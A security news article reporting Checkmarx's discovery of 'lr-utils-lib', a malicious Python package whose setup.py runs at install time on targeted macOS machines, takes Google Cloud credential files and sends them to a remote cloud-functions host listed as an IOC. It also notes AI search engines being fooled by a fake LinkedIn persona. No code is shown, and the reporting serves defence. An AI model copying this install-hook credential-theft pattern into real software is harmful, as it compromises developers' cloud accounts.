Malicious Python Package Attacking macOS Developers To Steal GCP Logins


Hackers continuously exploit malicious Python packages to attack developer environments and inject harmful code that enables them to steal sensitive information, install malware, or create backdoors.

The method takes advantage of the widely-used repositories for packaging consequently creating a widespread impact with minimum effort from the attackers.

Cybersecurity researchers at CheckMarx recently identified that threat actors have been actively abusing a malicious package, “lr-utils-lib” to attack macOS developers to steal Google Cloud logins.

Malicious Python Package

It has been found that a malicious package called “lr-utils-lib” targets macOS systems to steal Google Cloud Platform credentials.

Join our free webinar to learn about combating slow DDoS attacks, a major threat today.

This setup.py file of the package contains hidden code, which is activated during the installation, aimed specifically at macOS by checking system type and comparing the IOPlatformUUID of the device with a list of 64 pre-defined known hashes.

Once it finds a match, this malware tries to reach and take away sensitive data from ~/.config/gcloud/application_default_credentials.json files as well as credentials.db files.

All these will then be sent to a remote server (europe-west2-workload-422915.cloudfunctions.net).

Attack flow (Source – CheckMarx)

This sophisticated attack is linked to a fake LinkedIn profile under the name “Lucid Zenith” who claims to be the CEO of Apex Companies, LLC.

The incident revealed how advanced cyber threats are today in terms of combining malware distribution, social engineering tactics, and exploiting inconsistencies in AI search engines’ ability to verify information.

The “lr-utils-lib” malware attack was accompanied by a complex social engineering aspect of a fake LinkedIn account for “Lucid Zenith” who falsely claimed to be the CEO of Apex Companies, LLC.

Fake LinkedIn profile (Source – CheckMarx)

AI-driven search engines had insufficiently confirmed this trick, with some wrongly authenticating the false data.

This occurrence shows that threat actors can take advantage of flaws in information verification by AI systems and consequently it is important to check and double-check multiple sources when utilizing AI tools for research purposes.

The Python package “lr-utils-lib” reveals a targeted attack on macOS users who can steal Google Cloud credentials. For this reason, when working with third-party packages, one needs to be very careful about their security.

This event magnifies the broader cybersecurity problems that can arise from it such as having a fake LinkedIn profile and AI search engine verifiers that do not match with each other.

Software development and information-seeking techniques consequently require substantial scrutiny via rigorous vetting processes, multi-source verification, and critical thinking.

These types of attacks may begin by targeting individual developers, but they have far-reaching effects on enterprise security, which could cause data breaches and destroy reputations.

IOCs

  • europe-west2-workload-422915[.]cloudfunctions[.]net
  • lucid[.]zeniths[.]0j@icloud[.]com

Protect Your Business Emails From Spoofing, Phishing & BEC with AI-Powered Security | Free Demo



Source link